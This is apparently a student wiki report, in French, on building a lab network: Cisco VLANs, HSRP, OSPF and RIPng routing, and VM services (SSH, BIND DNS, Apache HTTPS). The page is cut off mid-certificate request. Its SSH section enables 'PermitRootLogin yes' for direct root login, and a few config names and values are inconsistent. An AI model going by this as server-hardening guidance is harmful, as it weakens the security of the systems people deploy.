Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
